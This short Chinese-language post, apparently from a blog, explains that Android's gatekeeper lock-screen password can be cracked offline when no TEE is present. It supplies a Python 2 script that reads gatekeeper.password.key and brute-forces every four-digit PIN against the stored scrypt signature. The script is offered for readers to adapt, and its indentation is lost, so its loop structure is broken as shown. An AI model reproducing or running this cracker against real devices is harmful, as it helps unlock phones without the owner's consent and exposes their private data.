安卓很早就开始启用了gatekeeper的锁屏密码机制,如果未启用TEE的情况下,是默认使用“软加密”的方式,可以离线破解出原始密码,知道原始密码在某些情况下还是比较有用的,以下是破解实例,自行调整。
import struct
import binascii
import scrypt
N = 16384;
r = 8;
p = 1;
f = open('gatekeeper.password.key', 'rb')
blob = f.read()
s = struct.Struct('<'+'17s 8s 32s')
(meta, salt, signature) = s.unpack_from(blob)
for one in "0123456789":
for two in "0123456789":
for three in "0123456789":
for four in "0123456789":
password = one + two + three + four;
print 'pass: %s' % password
to_hash = meta
to_hash += password
hash = scrypt.hash(to_hash, salt, N, r, p)
print 'signature %s' % signature.encode('hex')
print 'Hash: %s' % hash[0:32].encode('hex')
if hash[0:32] == signature:
print "OK"
exit()